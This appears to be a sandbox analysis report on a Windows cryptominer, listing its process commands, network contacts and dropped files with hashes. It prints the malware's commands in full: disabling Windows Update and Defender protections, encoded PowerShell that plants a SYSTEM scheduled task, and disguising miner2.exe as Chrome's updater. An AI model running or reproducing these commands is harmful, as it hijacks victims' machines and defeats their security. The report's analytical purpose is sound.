C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAYgAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBHAFkAQQBkAEEAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGEAdwBCAHEAQQBIAGsAQQBJAHcAQQArAEEAQQA9AD0AIgAnACkAIAA8ACMAeABsACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAZwBsAHAAbwAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGgAeQBjAGgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBiAHYAawBjACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwAbQBpAG4AZQByADIALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBzAGIAawBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBuAHQAcABhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGYAdAAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAawBqAHkAIwA+AA=="

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe "duhwxeji"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 168.117.168.52.in-addr.arpa udp

Files

memory/2648-1-0x0000000075110000-0x00000000758C1000-memory.dmp

memory/2648-0-0x0000000000410000-0x00000000006A6000-memory.dmp

memory/2648-2-0x00000000050E0000-0x00000000050F0000-memory.dmp

memory/2648-3-0x0000000005060000-0x0000000005061000-memory.dmp

memory/2648-4-0x0000000006530000-0x00000000067C0000-memory.dmp

C:\Windows\Temp\miner2.exe

MD5 64fa4d87885a9c469eccb0439e255741
SHA1 62b9d1398abde05f7cd300dcc91610d7a69c3321
SHA256 539950d10b9fe26e543bae99259d4734538c7c872015553b2000269f7dd66232
SHA512 19b2d066bfcfad55a75f863814dd21acfbaeded535d671d7660bc32a3f77569519fa3692d906aaeb4b59c3e36f529c3e2ef5d809c2602790b365db1c23a16792

C:\Windows\Temp\miner2.exe

MD5 c6451e29590ab9da28fe5eb7467248b4
SHA1 7089977d643b0937c8ef437b868465c27d279980
SHA256 5e81cac27a3cc7dc28e0c72f5caa6e327e98e0efb0a624ca86c6d21ea32963e2
SHA512 e990dcbdc8b3dc09274628d85a1c887c708e7e30b5ba51fa5a989636fa23d0151f375243b8b5dea28c2d555f5647ce017fad8685daabd3d89dd85aaa21461766

C:\Windows\Temp\miner2.exe

MD5 8b66eab88b56e35421bd98201aa21ce0
SHA1 a20cc5f21f948905f892e20e2fc57eb7f1160139
SHA256 dbd0c9edcb29fcf870b3ae1625a030c4dc71c24c6e2f32c7affc52667ab6cbe8
SHA512 e4da409d93859f10347b182a5942e858dfd0dfcf2de3b07dcd02ee590cf181172276339c1d26ca3ba24e287aa3f3c4e13114fc9a8295bc7655393b526ed4803e

memory/2648-17-0x0000000075110000-0x00000000758C1000-memory.dmp

memory/3228-19-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp

memory/3228-18-0x00000000007D0000-0x0000000000A5E000-memory.dmp

memory/3228-20-0x000000001C6D0000-0x000000001C6E0000-memory.dmp

memory/3228-21-0x0000000001460000-0x0000000001461000-memory.dmp

memory/3540-31-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp

memory/3540-30-0x000001D9EFE90000-0x000001D9EFEB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rgrhst1h.2s1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3540-33-0x000001D9EFF30000-0x000001D9EFF40000-memory.dmp

memory/3540-32-0x000001D9EFF30000-0x000001D9EFF40000-memory.dmp

memory/3540-34-0x000001D9EFF30000-0x000001D9EFF40000-memory.dmp

memory/3540-35-0x000001D9EFF30000-0x000001D9EFF40000-memory.dmp

memory/3540-38-0x000001D9F0040000-0x000001D9F018F000-memory.dmp

memory/3540-39-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp

memory/3228-40-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp

memory/3228-41-0x000000001C6D0000-0x000000001C6E0000-memory.dmp

memory/3228-42-0x0000000003690000-0x00000000036A2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

memory/4432-52-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp

memory/4432-53-0x0000017A5B320000-0x0000017A5B330000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7d760ca2472bcb9fe9310090d91318ce
SHA1 cb316b8560b38ea16a17626e685d5a501cd31c4a
SHA256 5c362b53c4a4578d8b57c51e1eac15f7f3b2447e43e0dad5102ecd003d5b41d4
SHA512 141e8661d7348ebbc1f74f828df956a0c6e4cdb70f3b9d52623c9a30993bfd91da9ed7d8d284b84f173d3e6f47c876fb4a8295110895f44d97fd6cc4c5659c35

memory/4432-55-0x0000017A5B320000-0x0000017A5B330000-memory.dmp

memory/4432-58-0x0000017A5B470000-0x0000017A5B5BF000-memory.dmp

memory/4432-59-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp

memory/3228-62-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp

memory/1408-63-0x0000022525E70000-0x0000022525E80000-memory.dmp

memory/1408-61-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp

memory/1408-64-0x0000022525E70000-0x0000022525E80000-memory.dmp

memory/1408-73-0x0000022525E70000-0x0000022525E80000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 44de920efeabc69ee9b9182919bce1f0
SHA1 d4c193f6da0d67212306e3cc1e8c47e815cbcfc6
SHA256 9c9fc62cc395129c6b7eae15787904a1cd06ef1a6ed553c96aa0fcca72ad22c6
SHA512 4f61ec955db1fe7f67b4b175fd611ef69258cae1b5da802ac5de0600c3db9fd078f3af55e206a29fd6546a78cd4a9b142e0f2db6c8e823f60b66f6374e2ee14a

C:\Program Files\Google\Chrome\updater.exe

MD5 4fce4e5dc8dbe04d993ef15a92ff0713
SHA1 1aac0bd32b9828cc834ba465a20269061f4a7f2b
SHA256 72c1c3c05d0fb946e49685ccfd383bc79186e30908f2cbeb534bdfd805f4f4e0
SHA512 53102d5d74abb923ce06a8a54a314173a549282d0082b4fdc3a821a2517fd401793cff08484344da9e183d2bf61d4be8ad3155390b936d193870d70efb651e75

memory/812-77-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp

memory/1408-79-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp

memory/812-80-0x000000001B470000-0x000000001B480000-memory.dmp

memory/812-81-0x0000000001510000-0x0000000001511000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 88dc70c361a22feac57b031dd9c1f02f
SHA1 a9b4732260c2a323750022a73480f229ce25d46d
SHA256 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA512 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

memory/692-88-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp

memory/692-89-0x0000016D6DF70000-0x0000016D6DF80000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 75d892015e838d87587a722f53dc8d29
SHA1 e731fe110fbd31a940da124faf10d253bdbb4743
SHA256 6790057711692446e5f1085e9e916db9f3d68d4c870a4ea173298c6c0e18ad41
SHA512 6ca766d4ff190a6a34f4283b6c426b16fece171973245d508696e17ee18338ed619419a73b48b25ed18bdde8fc61db7e9680c63932e29d08343058a51b30fa26

memory/692-103-0x00007FF448340000-0x00007FF448350000-memory.dmp

memory/692-104-0x0000016D6E330000-0x0000016D6E3E3000-memory.dmp

memory/692-102-0x0000016D6E310000-0x0000016D6E32C000-memory.dmp

memory/692-105-0x0000016D6E300000-0x0000016D6E30A000-memory.dmp

memory/692-106-0x0000016D6E660000-0x0000016D6E67C000-memory.dmp

memory/692-107-0x0000016D6E540000-0x0000016D6E54A000-memory.dmp

memory/692-108-0x0000016D6E6A0000-0x0000016D6E6BA000-memory.dmp

memory/692-109-0x0000016D6E550000-0x0000016D6E558000-memory.dmp

memory/692-110-0x0000016D6E680000-0x0000016D6E686000-memory.dmp

memory/692-111-0x0000016D6E690000-0x0000016D6E69A000-memory.dmp

memory/692-112-0x0000016D6DF70000-0x0000016D6DF80000-memory.dmp

memory/692-114-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp

memory/812-115-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp

memory/1640-117-0x0000024E88260000-0x0000024E88267000-memory.dmp

memory/812-116-0x0000000001E90000-0x0000000001E96000-memory.dmp

memory/1640-119-0x0000024E88A90000-0x0000024E88A96000-memory.dmp

memory/1640-120-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp

memory/1640-121-0x0000024E88AB0000-0x0000024E88AC0000-memory.dmp

memory/812-123-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp

memory/1640-124-0x00007FFF711C0000-0x00007FFF71C82000-memory.dmp

memory/1640-125-0x0000024E88AB0000-0x0000024E88AC0000-memory.dmp